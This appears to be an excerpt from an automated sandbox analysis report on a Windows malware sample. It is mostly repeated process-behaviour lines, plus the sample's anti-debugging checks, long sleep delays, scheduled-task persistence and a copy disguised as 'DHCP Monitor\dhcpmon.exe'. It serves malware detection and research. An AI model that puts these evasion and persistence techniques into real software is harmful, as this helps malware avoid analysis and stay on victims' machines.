        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exe TID: 8Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exe TID: 5928Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exe TID: 6488Thread sleep count: 43 > 30Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exe TID: 6448Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6808Thread sleep count: 42 > 30Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6804Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7052Thread sleep count: 41 > 30Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7032Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWindow / User API: threadDelayed 394Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWindow / User API: threadDelayed 372Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWindow / User API: foregroundWindowGot 596Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWindow / User API: foregroundWindowGot 651Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_00405E93 FindFirstFileA,FindClose,8_2_00405E93
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,8_2_004054BD
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_00402671 FindFirstFileA,8_2_00402671
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_00404A29 FindFirstFileExW,11_2_00404A29
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_1_00404A29 FindFirstFileExW,11_1_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_00404A29 FindFirstFileExW,14_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_1_00404A29 FindFirstFileExW,14_1_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_00404A29 FindFirstFileExW,23_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_1_00404A29 FindFirstFileExW,23_1_00404A29
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0040446F
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_6FF83070 ymvwfuvwx,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,0_2_6FF83070
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_6FF854DA mov eax, dword ptr fs:[00000030h]0_2_6FF854DA
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_6FF856EE mov eax, dword ptr fs:[00000030h]0_2_6FF856EE
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_6FF857DE mov eax, dword ptr fs:[00000030h]0_2_6FF857DE
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_6FF8579F mov eax, dword ptr fs:[00000030h]0_2_6FF8579F
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_6FF8581C mov eax, dword ptr fs:[00000030h]0_2_6FF8581C
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 1_1_004035F1 mov eax, dword ptr fs:[00000030h]1_1_004035F1
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_6FF854DA mov eax, dword ptr fs:[00000030h]8_2_6FF854DA
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_6FF856EE mov eax, dword ptr fs:[00000030h]8_2_6FF856EE
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_6FF857DE mov eax, dword ptr fs:[00000030h]8_2_6FF857DE
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_6FF8579F mov eax, dword ptr fs:[00000030h]8_2_6FF8579F
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 8_2_6FF8581C mov eax, dword ptr fs:[00000030h]8_2_6FF8581C
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_004035F1 mov eax, dword ptr fs:[00000030h]11_2_004035F1
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_1_004035F1 mov eax, dword ptr fs:[00000030h]11_1_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_6FF754DA mov eax, dword ptr fs:[00000030h]12_2_6FF754DA
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_6FF756EE mov eax, dword ptr fs:[00000030h]12_2_6FF756EE
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_6FF757DE mov eax, dword ptr fs:[00000030h]12_2_6FF757DE
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_6FF7579F mov eax, dword ptr fs:[00000030h]12_2_6FF7579F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_6FF7581C mov eax, dword ptr fs:[00000030h]12_2_6FF7581C
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_004035F1 mov eax, dword ptr fs:[00000030h]14_2_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_1_004035F1 mov eax, dword ptr fs:[00000030h]14_1_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 21_2_6FF854DA mov eax, dword ptr fs:[00000030h]21_2_6FF854DA
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 21_2_6FF856EE mov eax, dword ptr fs:[00000030h]21_2_6FF856EE
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 21_2_6FF857DE mov eax, dword ptr fs:[00000030h]21_2_6FF857DE
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 21_2_6FF8579F mov eax, dword ptr fs:[00000030h]21_2_6FF8579F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 21_2_6FF8581C mov eax, dword ptr fs:[00000030h]21_2_6FF8581C
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_004035F1 mov eax, dword ptr fs:[00000030h]23_2_004035F1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_1_004035F1 mov eax, dword ptr fs:[00000030h]23_1_004035F1
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 1_1_00401E1D SetUnhandledExceptionFilter,1_1_00401E1D
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_00401E1D SetUnhandledExceptionFilter,11_2_00401E1D
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0040446F
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00401C88
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00401F30
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_1_00401E1D SetUnhandledExceptionFilter,11_1_00401E1D
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_1_0040446F
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_1_00401C88
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_1_00401F30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_00401E1D SetUnhandledExceptionFilter,14_2_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0040446F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00401C88
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00401F30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_1_00401E1D SetUnhandledExceptionFilter,14_1_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_1_0040446F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_1_00401C88
